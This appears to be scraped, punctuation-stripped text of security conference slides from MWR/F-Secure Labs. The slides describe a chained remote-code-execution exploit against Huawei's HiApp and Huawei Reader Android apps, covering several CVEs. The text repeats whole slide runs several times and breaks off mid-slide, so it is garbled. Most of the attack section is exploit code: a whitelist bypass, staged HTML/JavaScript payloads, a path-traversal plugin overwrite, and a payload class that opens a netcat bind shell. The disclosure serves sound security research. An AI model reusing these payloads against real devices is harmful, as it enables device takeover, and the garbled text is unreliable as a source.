public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 29: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/29.jpg)
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 30: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/30.jpg)
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 31: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/31.jpg)
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 32: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/32.jpg)
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
